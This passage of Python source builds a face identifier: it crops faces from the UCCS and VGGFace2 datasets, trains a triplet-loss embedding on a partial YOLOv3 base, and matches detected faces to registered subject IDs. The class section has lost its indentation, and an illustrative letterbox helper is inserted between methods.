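# above): the same margin computed for a single triplet with plain NumPy, mirroring triplet_loss.
def _triplet_margin_example(anchor, positive, negative, alpha=ALPHA):
    # max(||a - p|| - ||a - n|| + alpha, 0): zero once the positive embedding is closer to the
    # anchor than the negative embedding by at least the alpha margin.
    return max(np.linalg.norm(anchor - positive) - np.linalg.norm(anchor - negative) + alpha, 0.0)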
def create_db_fi(conf):
    """Create db for face identifier."""
    conf = conf['fi_conf']
    if conf['resource_type'] == RESOURCE_TYPE_UCCS:
        raw_data_path = conf['raw_data_path']
        nn_arch = conf['nn_arch']
        if not os.path.isdir(os.path.join(raw_data_path, 'subject_faces')):
            os.mkdir(os.path.join(raw_data_path, 'subject_faces'))
        else:
            shutil.rmtree(os.path.join(raw_data_path, 'subject_faces'))
            os.mkdir(os.path.join(os.path.join(raw_data_path, 'subject_faces')))
        gt_df = pd.read_csv(os.path.join(raw_data_path, 'training', 'training.csv'))
        gt_df_g = gt_df.groupby('SUBJECT_ID')
        # Collect face region images and create db, by subject ids.
        db = pd.DataFrame(columns=['subject_id', 'face_file', 'w', 'h'])
        for k in gt_df_g.groups.keys():
            if k == -1: continue
            df = gt_df_g.get_group(k)
            for i in range(df.shape[0]):
                file_name = df.iloc[i, 1]
                # Load an image.
                image = imread(os.path.join(raw_data_path, 'training', file_name))
                # Check exception.
                res = df.iloc[i, 3:] > 0
                if res.all() == False:
                    continue
                # Crop a face region.
                l, t, r, b = (int(df.iloc[i, 3])
                              , int(df.iloc[i, 4])
                              , int((df.iloc[i, 3] + df.iloc[i, 5] - 1))
                              , int((df.iloc[i, 4] + df.iloc[i, 6] - 1)))
                image = image[(t - 1):(b - 1), (l - 1):(r - 1), :]
                # Adjust the original image size into the normalized image size according to the ratio of width, height.
                w = image.shape[1]
                h = image.shape[0]
                pad_t, pad_b, pad_l, pad_r = 0, 0, 0, 0
                if w >= h:
                    w_p = nn_arch['image_size']
                    h_p = int(h / w * nn_arch['image_size'])
                    pad = nn_arch['image_size'] - h_p
                    if pad % 2 == 0:
                        pad_t = pad // 2
                        pad_b = pad // 2
                    else:
                        pad_t = pad // 2
                        pad_b = pad // 2 + 1
                    image = cv.resize(image, (w_p, h_p), interpolation=cv.INTER_NEAREST)
                    image = cv.copyMakeBorder(image, pad_t, pad_b, 0, 0, cv.BORDER_CONSTANT, value=[0, 0, 0])  # 416x416?
                else:
                    h_p = nn_arch['image_size']
                    w_p = int(w / h * nn_arch['image_size'])
                    pad = nn_arch['image_size'] - w_p
                    if pad % 2 == 0:
                        pad_l = pad // 2
                        pad_r = pad // 2
                    else:
                        pad_l = pad // 2
                        pad_r = pad // 2 + 1
                    image = cv.resize(image, (w_p, h_p), interpolation=cv.INTER_NEAREST)
                    image = cv.copyMakeBorder(image, 0, 0, pad_l, pad_r, cv.BORDER_CONSTANT, value=[0, 0, 0])  # 416x416?
                # Write a face region image.
                face_file_name = file_name[:-4] + '_' + str(k) + '_' \
                                 + str(int(df.iloc[i, 3])) + '_' + str(int(df.iloc[i, 4])) + file_name[-4:]
                print('Save ' + face_file_name)
                imsave(os.path.join(raw_data_path, 'subject_faces', face_file_name), (image).astype('uint8'))
                # Add subject face information into db.
                db = pd.concat([db, pd.DataFrame({'subject_id': [k]
                                                  , 'face_file': [face_file_name]
                                                  , 'w': [w]
                                                  , 'h': [h]})])
        # Save db.
        db.to_csv('subject_image_db.csv')
    elif conf['resource_type'] == RESOURCE_TYPE_VGGFACE2:
        raw_data_path = conf['raw_data_path']
        nn_arch = conf['nn_arch']
        # Collect face region images and create db, by subject ids.
        pClient = ipp.Client()
        pView = pClient[:]
        pView.push({'raw_data_path': raw_data_path, 'nn_arch': nn_arch})
        with pView.sync_imports():
            import numpy as np
            import pandas as pd
            import cv2 as cv
            from skimage.io import imread, imsave
        if not os.path.isdir(os.path.join(raw_data_path, 'subject_faces_vggface2')):
            os.mkdir(os.path.join(raw_data_path, 'subject_faces_vggface2'))
        else:
            shutil.rmtree(os.path.join(raw_data_path, 'subject_faces_vggface2'))
            os.mkdir(os.path.join(os.path.join(raw_data_path, 'subject_faces_vggface2')))
        df = pd.read_csv(os.path.join(raw_data_path, 'loose_bb_train.csv'))
        db = pd.DataFrame(columns=['subject_id', 'face_file', 'w', 'h'])
        dfs = [df.iloc[i] for i in range(df.shape[0])]
        # dfs = [df.iloc[i] for i in range(100)]
        res = pView.map_sync(save_extracted_face, dfs)
        try:
            res.remove(None)
        except:
            pass
        db = pd.concat(res)
        # Save db.
        db.to_csv('subject_image_vggface2_db.csv')
    else:
        raise ValueError('resource type is not valid.')
def save_extracted_face(df):
    global raw_data_path, nn_arch
    import os
    cv = cv2
    pd = pandas
    np = numpy
    id_filename = df.iloc[0].split('/')
    identity = id_filename[0]
    file_name = id_filename[1] + '.jpg'
    x = df.iloc[1]
    y = df.iloc[2]
    w = df.iloc[3]
    h = df.iloc[4]
    if x < 0 or y < 0 or w <= 0 or h <= 0:
        return None
    # Load an image.
    image = imread(os.path.join(raw_data_path, 'train', identity, file_name))
    # Get a face region.
    image = image[y:(y + h), x:(x + w), :]
    # Adjust the original image size into the normalized image size according to the ratio of width, height.
    w = image.shape[1]
    h = image.shape[0]
    pad_t, pad_b, pad_l, pad_r = 0, 0, 0, 0
    if w >= h:
        w_p = nn_arch['image_size']
        h_p = int(h / w * nn_arch['image_size'])
        pad = nn_arch['image_size'] - h_p
        if pad % 2 == 0:
            pad_t = pad // 2
            pad_b = pad // 2
        else:
            pad_t = pad // 2
            pad_b = pad // 2 + 1
        image = cv.resize(image, (w_p, h_p), interpolation=cv.INTER_NEAREST)
        image = cv.copyMakeBorder(image, pad_t, pad_b, 0, 0, cv.BORDER_CONSTANT, value=[0, 0, 0])  # 416x416?
    else:
        h_p = nn_arch['image_size']
        w_p = int(w / h * nn_arch['image_size'])
        pad = nn_arch['image_size'] - w_p
        if pad % 2 == 0:
            pad_l = pad // 2
            pad_r = pad // 2
        else:
            pad_l = pad // 2
            pad_r = pad // 2 + 1
        image = cv.resize(image, (w_p, h_p), interpolation=cv.INTER_NEAREST)
        image = cv.copyMakeBorder(image, 0, 0, pad_l, pad_r, cv.BORDER_CONSTANT, value=[0, 0, 0])  # 416x416?
    # Write a face region image.
    face_file_name = identity + '_' + file_name
    print('Save ' + face_file_name)
    imsave(os.path.join(raw_data_path, 'subject_faces_vggface2', face_file_name), (image).astype('uint8'))
    # Add subject face information into db.
    return pd.DataFrame({'subject_id': [identity]
                         , 'face_file': [face_file_name]
                         , 'w': [w]
                         , 'h': [h]})
class FaceIdentifier(object):
"""Face identifier to use yolov3."""
# Constants.
MODEL_PATH = 'face_identifier.h5'
def __init__(self, conf):
"""
Parameters
----------
conf: dictionary
Face detector configuration dictionary.
"""
# Initialize.
self.conf = conf['fi_conf']
self.raw_data_path = self.conf['raw_data_path']
self.hps = self.conf['hps']
self.nn_arch = self.conf['nn_arch']
self.model_loading = self.conf['model_loading']
if self.model_loading:
if self.conf['multi_gpu']:
self.model = load_model(self.MODEL_PATH, custom_objects={'triplet_loss': triplet_loss})
self.parallel_model = multi_gpu_model(self.model, gpus=self.conf['num_gpus'])
opt = optimizers.Adam(lr=self.hps['lr']
, beta_1=self.hps['beta_1']
, beta_2=self.hps['beta_2']
, decay=self.hps['decay'])
self.parallel_model.compile(optimizer=opt, loss=triplet_loss)
else:
self.model = load_model(self.MODEL_PATH, custom_objects={'triplet_loss': triplet_loss})
else:
# Design the face identification model.
# Inputs.
input_a = Input(shape=(self.nn_arch['image_size'], self.nn_arch['image_size'], 3), name='input_a')
input_p = Input(shape=(self.nn_arch['image_size'], self.nn_arch['image_size'], 3), name='input_p')
input_n = Input(shape=(self.nn_arch['image_size'], self.nn_arch['image_size'], 3), name='input_n')
# Load yolov3 as the base model.
base = self.YOLOV3Base
base.name = 'base'
# Get triplet facial ids.
xa = base(input_a) # Non-linear.
xa = Flatten()(xa)
c_dense_layer = Dense(self.nn_arch['dense1_dim'], activation='relu', name='dense1')
l2_norm_layer = Lambda(lambda x: K.l2_normalize(x, axis=-1), name='l2_norm_layer')
xa = c_dense_layer(xa)
xa = l2_norm_layer(xa)
xp = base(input_p)
xp = Flatten()(xp)
xp = c_dense_layer(xp)
xp = l2_norm_layer(xp)
xn = base(input_n)
xn = Flatten()(xn)
xn = c_dense_layer(xn)
xn = l2_norm_layer(xn)
output = Concatenate(name='output')([xa, xp, xn]) #?
if self.conf['multi_gpu']:
self.model = Model(inputs=[input_a, input_p, input_n], outputs=[output])
opt = optimizers.Adam(lr=self.hps['lr']
, beta_1=self.hps['beta_1']
, beta_2=self.hps['beta_2']
, decay=self.hps['decay'])
self.model.compile(optimizer=opt, loss=triplet_loss)
self.model.summary()
self.parallel_model = multi_gpu_model(Model(inputs=[input_a, input_p, input_n], outputs=[output])
, gpus=self.conf['num_gpus'])
self.parallel_model.compile(optimizer=opt, loss=triplet_loss)
self.parallel_model.summary()
else:
self.model = Model(inputs=[input_a, input_p, input_n], outputs=[output])
opt = optimizers.Adam(lr=self.hps['lr']
, beta_1=self.hps['beta_1']
, beta_2=self.hps['beta_2']
, decay=self.hps['decay'])
self.model.compile(optimizer=opt, loss=triplet_loss)
self.model.summary()
# Create face detector.
self.fd = FaceDetector(conf['fd_conf'])
# Make fid extractor and face identifier.
self._make_fid_extractor()
def _make_fid_extractor(self):
"""Make facial id extractor."""
# Design the face identification model.
# Inputs.
input1 = Input(shape=(self.nn_arch['image_size'], self.nn_arch['image_size'], 3), name='input1')
# Load yolov3 as the base model.
base = self.model.get_layer('base')
# Get facial id.
x = base(input1) # Non-linear.
x = Flatten()(x)
x = self.model.get_layer('dense1')(x)
x = self.model.get_layer('l2_norm_layer')(x)
facial_id = x
self.fid_extractor = Model(inputs=[input1], outputs=[facial_id])
@property
def YOLOV3Base(self):
"""Get yolov3 as a base model.
Returns
-------
Model of Keras
Partial yolo3 model from the input layer to the add_23 layer
"""
if self.conf['yolov3_base_model_load']:
base = load_model('yolov3_base.h5')
base.trainable = True
return base
yolov3 = make_yolov3_model()
# Load the weights.
weight_reader = WeightReader('yolov3.weights')
weight_reader.load_weights(yolov3)
# Make a base model.
input1 = Input(shape=(self.nn_arch['image_size'], self.nn_arch['image_size'], 3), name='input1')
# 0 ~ 1.
conv_layer = yolov3.get_layer('conv_' + str(0))
x = ZeroPadding2D(1)(input1) #?
x = conv_layer(x)
norm_layer = yolov3.get_layer('bnorm_' + str(0))
x = norm_layer(x)
x = LeakyReLU(alpha=0.1)(x)
conv_layer = yolov3.get_layer('conv_' + str(1))
x = ZeroPadding2D(1)(x) #?
x = conv_layer(x)
norm_layer = yolov3.get_layer('bnorm_' + str(1))
x = norm_layer(x)
x = LeakyReLU(alpha=0.1)(x)
skip = x
# 2 ~ 3.
for i in range(2, 4, 2):
conv_layer = yolov3.get_layer('conv_' + str(i))
if conv_layer.kernel_size[0] > 1:
x = ZeroPadding2D(1)(x) #?
x = conv_layer(x)
norm_layer = yolov3.get_layer('bnorm_' + str(i))
x = norm_layer(x)
x = LeakyReLU(alpha=0.1)(x)
conv_layer = yolov3.get_layer('conv_' + str(i + 1))
if conv_layer.kernel_size[0] > 1:
x = ZeroPadding2D(1)(x) #?
x = conv_layer(x)
norm_layer = yolov3.get_layer('bnorm_' + str(i + 1))
x = norm_layer(x)
x = LeakyReLU(alpha=0.1)(x)
x = add([skip, x]) #?
# 5.
conv_layer = yolov3.get_layer('conv_' + str(5))
if conv_layer.kernel_size[0] > 1:
x = ZeroPadding2D(1)(x) #?
x = conv_layer(x)
norm_layer = yolov3.get_layer('bnorm_' + str(5))
x = norm_layer(x)
x = LeakyReLU(alpha=0.1)(x)
skip = x
# 6 ~ 10.
for i in range(6, 10, 3):
conv_layer = yolov3.get_layer('conv_' + str(i))
if conv_layer.kernel_size[0] > 1:
x = ZeroPadding2D(1)(x) #?
x = conv_layer(x)
norm_layer = yolov3.get_layer('bnorm_' + str(i))
x = norm_layer(x)
x = LeakyReLU(alpha=0.1)(x)
conv_layer = yolov3.get_layer('conv_' + str(i + 1))
if conv_layer.kernel_size[0] > 1:
x = ZeroPadding2D(1)(x) #?
x = conv_layer(x)
norm_layer = yolov3.get_layer('bnorm_' + str(i + 1))
x = norm_layer(x)
x = LeakyReLU(alpha=0.1)(x)
x = add([skip, x]) #?
skip = x #?
# 12.
conv_layer = yolov3.get_layer('conv_' + str(12))
if conv_layer.kernel_size[0] > 1:
x = ZeroPadding2D(1)(x) #?
x = conv_layer(x)
norm_layer = yolov3.get_layer('bnorm_' + str(12))
x = norm_layer(x)
x = LeakyReLU(alpha=0.1)(x)
skip = x
# 13 ~ 35.
for i in range(13, 35, 3):
conv_layer = yolov3.get_layer('conv_' + str(i))
if conv_layer.kernel_size[0] > 1:
x = ZeroPadding2D(1)(x) #?
x = conv_layer(x)
norm_layer = yolov3.get_layer('bnorm_' + str(i))
x = norm_layer(x)
x = LeakyReLU(alpha=0.1)(x)
conv_layer = yolov3.get_layer('conv_' + str(i + 1))
if conv_layer.kernel_size[0] > 1:
x = ZeroPadding2D(1)(x) #?
x = conv_layer(x)
norm_layer = yolov3.get_layer('bnorm_' + str(i + 1))
x = norm_layer(x)
x = LeakyReLU(alpha=0.1)(x)
x = add([skip, x]) #?
skip = x #?
# 37.
conv_layer = yolov3.get_layer('conv_' + str(37))
if conv_layer.kernel_size[0] > 1:
x = ZeroPadding2D(1)(x) #?
x = conv_layer(x)
norm_layer = yolov3.get_layer('bnorm_' + str(37))
x = norm_layer(x)
x = LeakyReLU(alpha=0.1)(x)
skip = x
# 38 ~ 60.
for i in range(38, 60, 3):
conv_layer = yolov3.get_layer('conv_' + str(i))
if conv_layer.kernel_size[0] > 1:
x = ZeroPadding2D(1)(x) #?
x = conv_layer(x)
norm_layer = yolov3.get_layer('bnorm_' + str(i))
x = norm_layer(x)
x = LeakyReLU(alpha=0.1)(x)
conv_layer = yolov3.get_layer('conv_' + str(i + 1))
if conv_layer.kernel_size[0] > 1:
x = ZeroPadding2D(1)(x) #?
x = conv_layer(x)
norm_layer = yolov3.get_layer('bnorm_' + str(i + 1))
x = norm_layer(x)
x = LeakyReLU(alpha=0.1)(x)
x = add([skip, x]) #?
skip = x #?
# 62.
conv_layer = yolov3.get_layer('conv_' + str(62))
if conv_layer.kernel_size[0] > 1:
x = ZeroPadding2D(1)(x) #?
x = conv_layer(x)
norm_layer = yolov3.get_layer('bnorm_' + str(62))
x = norm_layer(x)
x = LeakyReLU(alpha=0.1)(x)
skip = x
# 63 ~ 73.
for i in range(63, 73, 3):
conv_layer = yolov3.get_layer('conv_' + str(i))
if conv_layer.kernel_size[0] > 1:
x = ZeroPadding2D(1)(x) #?
x = conv_layer(x)
norm_layer = yolov3.get_layer('bnorm_' + str(i))
x = norm_layer(x)
x = LeakyReLU(alpha=0.1)(x)
conv_layer = yolov3.get_layer('conv_' + str(i + 1))
if conv_layer.kernel_size[0] > 1:
x = ZeroPadding2D(1)(x) #?
x = conv_layer(x)
norm_layer = yolov3.get_layer('bnorm_' + str(i + 1))
x = norm_layer(x)
x = LeakyReLU(alpha=0.1)(x)
x = add([skip, x]) #?
skip = x #?
output = x
base = Model(inputs=[input1], outputs=[output])
base.trainable = True
base.save('yolov3_base.h5')
return base
def train(self):
"""Train face detector."""
if self.conf['resource_type'] == RESOURCE_TYPE_UCCS:
trGen = self.TrainingSequence(self.raw_data_path, self.hps, self.nn_arch, load_flag=False)
elif self.conf['resource_type'] == RESOURCE_TYPE_VGGFACE2:
trGen = self.TrainingSequenceVGGFace2(self.raw_data_path, self.hps, self.nn_arch, load_flag=False)
else:
raise ValueError('resource type is not valid.')
if self.conf['multi_gpu']:
self.parallel_model.fit_generator(trGen
, steps_per_epoch=self.hps['step'] #?
, epochs=self.hps['epochs']
, verbose=1
, max_queue_size=400
, workers=8
, use_multiprocessing=True)
else:
self.model.fit_generator(trGen
, steps_per_epoch=self.hps['step']
, epochs=self.hps['epochs']
, verbose=1
, max_queue_size=100
, workers=4
, use_multiprocessing=True)
print('Save the model.')
self.model.save(self.MODEL_PATH)
def make_facial_ids_db(self):
"""Make facial ids database."""
if self.conf['resource_type'] == RESOURCE_TYPE_UCCS:
db = pd.read_csv('subject_image_db.csv')
db = db.iloc[:, 1:]
db_g = db.groupby('subject_id')
with h5py.File('subject_facial_ids.h5', 'w') as f:
for subject_id in db_g.groups.keys():
if subject_id == -1:
continue
# Get face images of a subject id.
df = db_g.get_group(subject_id)
images = []
for ff in list(df.iloc[:, 1]):
image = imread(os.path.join(self.raw_data_path, 'subject_faces', ff))
images.append(image/255)
images = np.asarray(images)
# Calculate facial ids and an averaged facial id of a subject id. Mean, Mode, Median?
facial_ids = self.fid_extractor.predict(images)
for k, ff in enumerate(list(df.iloc[:, 1])):
f[ff] = facial_ids[k]
f[ff].attrs['subject_id'] = subject_id
elif self.conf['resource_type'] == RESOURCE_TYPE_VGGFACE2:
db = pd.read_csv('subject_image_vggface2_db.csv')
db = db.iloc[:, 1:]
db_g = db.groupby('subject_id')
with h5py.File('subject_facial_vggface2_ids.h5', 'w') as f:
for subject_id in db_g.groups.keys():
if subject_id == -1:
continue
# Get face images of a subject id.
df = db_g.get_group(subject_id)
images = []
for ff in list(df.iloc[:, 1]):
image = imread(os.path.join(self.raw_data_path, 'subject_faces_vggface2', ff)) #?
images.append(image/255)
images = np.asarray(images)
# Calculate facial ids and an averaged facial id of a subject id. Mean, Mode, Median?
facial_ids = self.fid_extractor.predict(images)
for k, ff in enumerate(list(df.iloc[:, 1])):
f[ff] = facial_ids[k]
f[ff].attrs['subject_id'] = subject_id
else:
raise ValueError('resource type is not valid.')
def register_facial_ids(self):
"""Register facial ids."""
if self.conf['resource_type'] == RESOURCE_TYPE_UCCS:
db = pd.read_csv('subject_image_db.csv')
db = db.iloc[:, 1:]
db_g = db.groupby('subject_id')
db_facial_id = pd.DataFrame(columns=['subject_id', 'facial_id'])
for subject_id in db_g.groups.keys():
if subject_id == -1:
continue
# Get face images of a subject id.
df = db_g.get_group(subject_id)
images = []
for ff in list(df.iloc[:, 1]):
image = imread(os.path.join(self.raw_data_path, 'subject_faces', ff))
images.append(image/255)
images = np.asarray(images)
# Calculate facial ids and an averaged facial id of a subject id. Mean, Mode, Median?
facial_ids = self.fid_extractor.predict(images)
facial_id = np.asarray(pd.DataFrame(facial_ids).mean())
db_facial_id = pd.concat([db_facial_id, pd.DataFrame({'subject_id': [subject_id]
, 'facial_id': [facial_id]})])
# Save db.
db_facial_id.index = db_facial_id.subject_id
db_facial_id = db_facial_id.to_dict()['facial_id']
with open('ref_facial_id_db.pickle', 'wb') as f:
pickle.dump(db_facial_id, f)
elif self.conf['resource_type'] == RESOURCE_TYPE_VGGFACE2:
"""Register facial ids."""
db = pd.read_csv('subject_image_vggface2_db.csv')
db = db.iloc[:, 1:]
db_g = db.groupby('subject_id')
db_facial_id = pd.DataFrame(columns=['subject_id', 'facial_id'])
for subject_id in db_g.groups.keys():
if subject_id == -1:
continue
# Get face images of a subject id.
df = db_g.get_group(subject_id)
images = []
for ff in list(df.iloc[:, 1]):
image = imread(os.path.join(self.raw_data_path, 'subject_faces_vggface2', ff))
images.append(image/255)
images = np.asarray(images)
# Calculate facial ids and an averaged facial id of a subject id. Mean, Mode, Median?
facial_ids = self.fid_extractor.predict(images)
facial_id = np.asarray(pd.DataFrame(facial_ids).mean())
db_facial_id = pd.concat([db_facial_id, pd.DataFrame({'subject_id': [subject_id]
, 'facial_id': [facial_id]})])
# Save db.
db_facial_id.index = db_facial_id.subject_id
db_facial_id = db_facial_id.to_dict()['facial_id']
with open('ref_facial_id_vggface2_db.pickle', 'wb') as f:
pickle.dump(db_facial_id, f)
def evaluate(self):
"""Evaluate."""
test_path = self.conf['test_path']
output_file_path = self.conf['output_file_path']
if not os.path.isdir(os.path.join(test_path, 'results_fi')):
os.mkdir(os.path.join(test_path, 'results_fi'))
else:
shutil.rmtree(os.path.join(test_path, 'results_fi'))
os.mkdir(os.path.join(test_path, 'results_fi'))
gt_df = pd.read_csv(os.path.join(test_path, 'validation.csv'))
gt_df_g = gt_df.groupby('FILE')
file_names = glob.glob(os.path.join(test_path, '*.jpg'))
with open('ref_facial_id_db.pickle', 'rb') as f:
db_facial_id = pickle.load(f)
# Get registered facial id data.
subject_ids = list(db_facial_id.keys())
facial_ids = []
for subject_id in subject_ids:
facial_ids.append(db_facial_id[subject_id])
reg_facial_ids = np.asarray(facial_ids)
# Detect faces, identify faces and save results.
count1 = 1
with open(output_file_path, 'w') as f:
for file_name in file_names:
if DEBUG: print(count1, '/', len(file_names), file_name)
count1 += 1
# Load an image.
image = imread(os.path.join(test_path, file_name))
image_o = image.copy()
image = image/255
# Adjust the original image size into the normalized image size according to the ratio of width, height.
w = image.shape[1]
h = image.shape[0]
pad_t, pad_b, pad_l, pad_r = 0, 0, 0, 0
if w >= h:
w_p = self.nn_arch['image_size']
h_p = int(h / w * self.nn_arch['image_size'])
pad = self.nn_arch['image_size'] - h_p
if pad % 2 == 0:
pad_t = pad // 2
pad_b = pad // 2
else:
pad_t = pad // 2
pad_b = pad // 2 + 1
image = cv.resize(image, (w_p, h_p), interpolation=cv.INTER_CUBIC)
image = cv.copyMakeBorder(image, pad_t, pad_b, 0, 0, cv.BORDER_CONSTANT, value=[0, 0, 0]) # 416x416?
else:
h_p = self.nn_arch['image_size']
w_p = int(w / h * self.nn_arch['image_size'])
pad = self.nn_arch['image_size'] - w_p
if pad % 2 == 0:
pad_l = pad // 2
pad_r = pad // 2
else:
pad_l = pad // 2
pad_r = pad // 2 + 1
image = cv.resize(image, (w_p, h_p), interpolation=cv.INTER_CUBIC)
image = cv.copyMakeBorder(image, 0, 0, pad_l, pad_r, cv.BORDER_CONSTANT, value=[0, 0, 0]) # 416x416?
image = image[np.newaxis, :]
# Detect faces.
boxes = self.fd.detect(image)
# correct the sizes of the bounding boxes
for box in boxes:
if w >= h:
box.xmin = np.min([box.xmin * w / self.nn_arch['image_size'], w])
box.xmax = np.min([box.xmax * w / self.nn_arch['image_size'], w])
box.ymin = np.min([np.max([box.ymin - pad_t, 0]) * w / self.nn_arch['image_size'], h])
box.ymax = np.min([np.max([box.ymax - pad_t, 0]) * w / self.nn_arch['image_size'], h])
else:
box.xmin = np.min([np.max([box.xmin - pad_l, 0]) * h / self.nn_arch['image_size'], w])
box.xmax = np.min([np.max([box.xmax - pad_l, 0]) * h / self.nn_arch['image_size'], w])
box.ymin = np.min([box.ymin * h / self.nn_arch['image_size'], h])
box.ymax = np.min([box.ymax * h / self.nn_arch['image_size'], h])
count = 1
for box in boxes:
if count > 60:
break
# Search for id from registered facial ids.
# Crop a face region.
l, t, r, b = int(box.xmin), int(box.ymin), int(box.xmax), int(box.ymax)
image = image_o[(t - 1):(b - 1), (l - 1):(r - 1), :]
image = image/255
# Letterbox: scale the cropped face to the network input size, preserving the width/height ratio, and pad the remainder.
w = image.shape[1]
h = image.shape[0]
pad_t, pad_b, pad_l, pad_r = 0, 0, 0, 0
# Check exception.
if w == 0 or h == 0:
continue
if w >= h:
w_p = self.nn_arch['image_size']
h_p = int(h / w * self.nn_arch['image_size'])
pad = self.nn_arch['image_size'] - h_p
if pad % 2 == 0:
pad_t = pad // 2
pad_b = pad // 2
else:
pad_t = pad // 2
pad_b = pad // 2 + 1
image = cv.resize(image, (w_p, h_p), interpolation=cv.INTER_CUBIC)
image = cv.copyMakeBorder(image, pad_t, pad_b, 0, 0, cv.BORDER_CONSTANT, value=[0, 0, 0]) # 416x416?
else:
h_p = self.nn_arch['image_size']
w_p = int(w / h * self.nn_arch['image_size'])
pad = self.nn_arch['image_size'] - w_p
if pad % 2 == 0:
pad_l = pad // 2
pad_r = pad // 2
else:
pad_l = pad // 2
pad_r = pad // 2 + 1
image = cv.resize(image, (w_p, h_p), interpolation=cv.INTER_CUBIC)
image = cv.copyMakeBorder(image, 0, 0, pad_l, pad_r, cv.BORDER_CONSTANT, value=[0, 0, 0]) # 416x416?
# Create anchor facial ids.
anchor_facial_id = self.fid_extractor.predict(image[np.newaxis, ...])
anchor_facial_id = np.squeeze(anchor_facial_id)
# Calculate the similarity distance to each registered facial id.
sim_dists = []
for i in range(len(subject_ids)):
sim_dists.append(norm(anchor_facial_id - reg_facial_ids[i]))
sim_dists = np.asarray(sim_dists)
cand = np.argmin(sim_dists)
if sim_dists[cand] > self.hps['sim_th']:
continue
subject_id = subject_ids[cand]
box.subject_id = subject_id
if platform.system() == 'Windows':
f.write(file_name.split('\\')[-1] + ',' + str(subject_id) + ',' + str(box.xmin) + ',' + str(box.ymin) + ',')
print(file_name.split('\\')[-1] + ',' + str(subject_id) + ',' + str(box.xmin) + ',' + str(box.ymin) + ',', end=' ')
else:
f.write(file_name.split('/')[-1] + ',' + str(subject_id) + ',' + str(box.xmin) + ',' + str(box.ymin) + ',')
print(file_name.split('/')[-1] + ',' + str(subject_id) + ',' + str(box.xmin) + ',' + str(box.ymin) + ',', end=' ')
f.write(str(box.xmax - box.xmin) + ',' + str(box.ymax - box.ymin) + ',' + str(box.get_score()) + '\n')
print(str(box.xmax - box.xmin) + ',' + str(box.ymax - box.ymin) + ',' + str(box.get_score()))
count +=1
#boxes = [box for box in boxes if box.subject_id != -1]
# Draw bounding boxes of ground truth.
if platform.system() == 'Windows':
file_new_name = file_name.split('\\')[-1]
else:
file_new_name = file_name.split('/')[-1]
try:
df = gt_df_g.get_group(file_new_name)
except KeyError:
continue
gt_boxes = []
for i in range(df.shape[0]):
# Check exception.
res = df.iloc[i, 3:] > 0 #?
if res.all() == False: #or df.iloc[i, 2] == -1:
continue
xmin = int(df.iloc[i, 3])
xmax = int(xmin + df.iloc[i, 5] - 1)
ymin = int(df.iloc[i, 4])
ymax = int(ymin + df.iloc[i, 6] - 1)
gt_box = BoundBox(xmin, ymin, xmax, ymax, objness=1., classes=[1.0], subject_id=df.iloc[i, 2])
gt_boxes.append(gt_box)
# Check exception.
if len(gt_boxes) == 0 or len(boxes) == 0: #?
continue
image1 = draw_boxes_v3(image_o, gt_boxes, self.hps['face_conf_th'], color=(255, 0, 0))
del image_o
# Draw bounding boxes on the image using labels.
image = draw_boxes_v3(image1, boxes, self.hps['face_conf_th'], color=(0, 255, 0))
del image1
# Write the image with bounding boxes to file.
# Build the output file name.
if platform.system() == 'Windows':
file_new_name = file_name.split('\\')[-1]
else:
file_new_name = file_name.split('/')[-1]
file_new_name = file_new_name[:-4] + '_detected' + file_new_name[-4:]
print(file_new_name)
imsave(os.path.join(test_path, 'results_fi', file_new_name), (image).astype('uint8'))
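# --- Illustrative sketch, not part of the original class ---
# evaluate() and test() both resize images with the same letterbox scheme: the
# longer side is scaled to the network input size and the shorter side is padded
# with black so the aspect ratio survives. The target size of 416 below is an
# assumption taken from the "416x416?" comments.
import cv2 as cv
import numpy as np

def letterbox_sketch(image, target_size=416):
    """Resize an HxWxC image to target_size x target_size without distortion."""
    h, w = image.shape[:2]
    scale = target_size / max(h, w)
    w_p, h_p = int(round(w * scale)), int(round(h * scale))
    resized = cv.resize(image, (w_p, h_p), interpolation=cv.INTER_CUBIC)
    pad_w, pad_h = target_size - w_p, target_size - h_p
    return cv.copyMakeBorder(resized,
                             pad_h // 2, pad_h - pad_h // 2,
                             pad_w // 2, pad_w - pad_w // 2,
                             cv.BORDER_CONSTANT, value=[0, 0, 0])

# letterbox_sketch(np.zeros((300, 500, 3)), 416).shape -> (416, 416, 3)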
def test(self):
"""Test."""
test_path = self.conf['test_path']
output_file_path = self.conf['output_file_path']
file_names = glob.glob(os.path.join(test_path, '*.jpg'))
with open('ref_facial_id_db.pickle', 'rb') as f:
db_facial_id = pickle.load(f)
# Get registered facial id data.
subject_ids = list(db_facial_id.keys())
facial_ids = []
for subject_id in subject_ids:
facial_ids.append(db_facial_id[subject_id])
reg_facial_ids = np.asarray(facial_ids)
# Detect faces, identify faces and save results.
count1 = 1
with open(output_file_path, 'w') as f:
for file_name in file_names:
if DEBUG: print(count1, '/', len(file_names), file_name)
count1 += 1
# Load an image.
image = imread(os.path.join(test_path, file_name))
image_o = image.copy()
image = image/255
# Letterbox: scale the image to the network input size, preserving the width/height ratio, and pad the remainder.
w = image.shape[1]
h = image.shape[0]
pad_t, pad_b, pad_l, pad_r = 0, 0, 0, 0
if w >= h:
w_p = self.nn_arch['image_size']
h_p = int(h / w * self.nn_arch['image_size'])
pad = self.nn_arch['image_size'] - h_p
if pad % 2 == 0:
pad_t = pad // 2
pad_b = pad // 2
else:
pad_t = pad // 2
pad_b = pad // 2 + 1
image = cv.resize(image, (w_p, h_p), interpolation=cv.INTER_CUBIC)
image = cv.copyMakeBorder(image, pad_t, pad_b, 0, 0, cv.BORDER_CONSTANT, value=[0, 0, 0]) # 416x416?
else:
h_p = self.nn_arch['image_size']
w_p = int(w / h * self.nn_arch['image_size'])
pad = self.nn_arch['image_size'] - w_p
if pad % 2 == 0:
pad_l = pad // 2
pad_r = pad // 2
else:
pad_l = pad // 2
pad_r = pad // 2 + 1
image = cv.resize(image, (w_p, h_p), interpolation=cv.INTER_CUBIC)
image = cv.copyMakeBorder(image, 0, 0, pad_l, pad_r, cv.BORDER_CONSTANT, value=[0, 0, 0]) # 416x416?
image = image[np.newaxis, :]
# Detect faces.
boxes = self.fd.detect(image)
# correct the sizes of the bounding boxes
for box in boxes:
if w >= h:
box.xmin = np.min([box.xmin * w / self.nn_arch['image_size'], w])
box.xmax = np.min([box.xmax * w / self.nn_arch['image_size'], w])
box.ymin = np.min([np.max([box.ymin - pad_t, 0]) * w / self.nn_arch['image_size'], h])
box.ymax = np.min([np.max([box.ymax - pad_t, 0]) * w / self.nn_arch['image_size'], h])
else:
box.xmin = np.min([np.max([box.xmin - pad_l, 0]) * h / self.nn_arch['image_size'], w])
